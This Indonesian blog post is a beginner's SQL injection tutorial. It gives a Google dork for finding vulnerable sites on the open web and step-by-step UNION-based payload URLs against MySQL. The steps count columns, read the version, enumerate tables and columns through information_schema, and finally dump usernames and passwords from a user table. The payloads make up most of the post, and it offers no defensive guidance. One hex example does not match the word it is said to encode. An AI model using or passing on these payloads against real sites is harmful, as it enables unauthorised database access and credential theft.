Beranda » Hacking » Teknik Dasar SQL Injection

Teknik Dasar SQL Injection

Start here

sebelum melakukan sql inject kita terlebih dahulu tau apa itu Sql inject ???
Sql injection adalah adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

step 1

cari target di google. contoh inurl:page.php?uid=1
klo udah dapat beri tanda petik( ‘ ) ato karakter ( – ).gunanya untuk melihat apakah ada error pada target tersebut.

step 2
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:
Code:

[site]/target.php?id=-1+order+by+1– atau
[site]/target.php?id=-1+order+by+1/*

contoh

[site]/target.php?id=-1+order+by+1–
[site]/target.php?id=-1+order+by+2–
[site]/target.php?id=-1+order+by+3–

sehingga muncul pesan error

misal: [site]/target.php?id=-1+order+by+4–

berarti kita ambil angka 3
menjadi [site]/target.php?id=-1+order+by+3–

step 3
untuk mengeluarkan angka error dari 1-4
code

[site]/target.php?id=-1+union+select+1,2,3,–

misalkan angka yang muncul adalah angka 2

contoh:

[site]/target.php?id=-1+union+select+1,version(),3–

apabila kita udah pake code version maka akan muncul angka
contoh : angka yang muncul adalah angka 5 maka angka ini bisa dikatakan angka keberuntungan
karena angka 5 adalah mysql versi 5 berarti kita bisa inject gitu lho..
step 4
untuk menampilkan isi table

code:
[site]/target.php?id=-1+union+select+1,group_concat(table_name), 3+from+information_schema.tables+where+table_s chema=database()–

step 5
hampir sama dengan perintah step 4 tadi letak perbedaannya (column_name & 0xhexa)
code:

[site]/target.php?id=-1+union+select+1,group_concat(column_name), 3+from+information_schema.columns+where+table _name=0xhexa–

untuk mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi : disini

misalkan kata yg muncul si table_name td adalah password maka kita conversi kata password tersebut menjadi
70617373776F7264
contoh

[site]/target.php?id=-1+union+select+1,group_concat(column_name), 3+from+information_schema.columns+where+table _name=0x75736572–

tulisan 0xhexa diganti menjadi 0x75736572

step 6
untuk memunculkan apa yang di keluarkan table yg tadi
contoh

[site]/target.php?id=-1+union+select+1,concat_ws(0x3a,hasil isi column),3+from+(nama table berasal)–

misalkan keluar seperti ini
username,password

[site]/target.php?id=-1+union+select+1,concat_ws(0x3a,id,username,password),3+from+user–

selesai……….sudah

references : http://coconutstmik.com | http://en.wikipedia.org/wiki/SQL_injection
http://www.unixwiz.net/techtips/sql-injection.html


Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s